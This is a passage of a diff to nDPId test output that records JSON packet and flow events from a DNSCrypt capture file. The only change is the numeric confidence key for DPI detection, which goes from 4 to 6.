02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAXcgvMgAL0RdJ4KAAABNEHrgdhxAbsGBOwCCnIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":215,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739311802} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":215,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAABQgvMAub0RmXEKAAABNEHrgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":946739312102,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312102,"pkt":"ZmZmZmZmRERERERECABFAADUhiJAACkR6nc0QeuBCgAAAQG72hoAwNtICnOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAHR7dJhGoyFx8KdrkIsoh61C8rxtxAaFzxQo\/agVQzzjpZ5APiE6q3FOpAI96QjakMreCrdTAjP8EJbJX\/I6UH9uHXHTkXq4cOyA70iJwlafDxONoi+u6\/0zTNviG6FU724dcdORerhwAAAAFfU2DvX1Sybw=="} @@ -435,54 +435,54 @@ 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312105,"pkt":"ZmZmZmZmRERERERECABFAADUhiVAACkR6nQ0QeuBCgAAAQG7ukUAwPsiCm6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAHR7dJhGoyFx8KdrkIsoh61C8rxtxAaFzxQo\/agVQzzjpZ5APiE6q3FOpAI96QjakMreCrdTAjP8EJbJX\/I6UH9uHXHTkXq4cOyA70iJwlafDxONoi+u6\/0zTNviG6FU724dcdORerhwAAAAFfU2DvX1Sybw=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAXcRfwgAL0RYAgKAAABMw8+QZecAbsGBGX0xUgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAW9AAwFuQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312105,"pkt":"ZmZmZmZmRERERERECABFAADUhiZAACkR6nM0QeuBCgAAAQG72HEAwNzyCnKBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAHR7dJhGoyFx8KdrkIsoh61C8rxtxAaFzxQo\/agVQzzjpZ5APiE6q3FOpAI96QjakMreCrdTAjP8EJbJX\/I6UH9uHXHTkXq4cOyA70iJwlafDxONoi+u6\/0zTNviG6FU724dcdORerhwAAAAFfU2DvX1Sybw=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":222,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312105} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":222,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAABQRfwAub0RhNsKAAABMw8+QQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAIcRf1AAL0RQ8cKAAABMw8+QbOpAbsCCDQmxUkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAHBAAwBvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAXcRf4gAL0RYAYKAAABMw8+Qd1wAbsGBCAixUYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAW9AAwFuQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":225,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312105} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":225,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAABQRf4Aub0RhNkKAAABMw8+QQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312105,"pkt":"ZmZmZmZmRERERERECABFAADUhidAACgR63I0QeuBCgAAAQG72qsAwNq7Cm+BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAHR7dJhGoyFx8KdrkIsoh61C8rxtxAaFzxQo\/agVQzzjpZ5APiE6q3FOpAI96QjakMreCrdTAjP8EJbJX\/I6UH9uHXHTkXq4cOyA70iJwlafDxONoi+u6\/0zTNviG6FU724dcdORerhwAAAAFfU2DvX1Sybw=="} 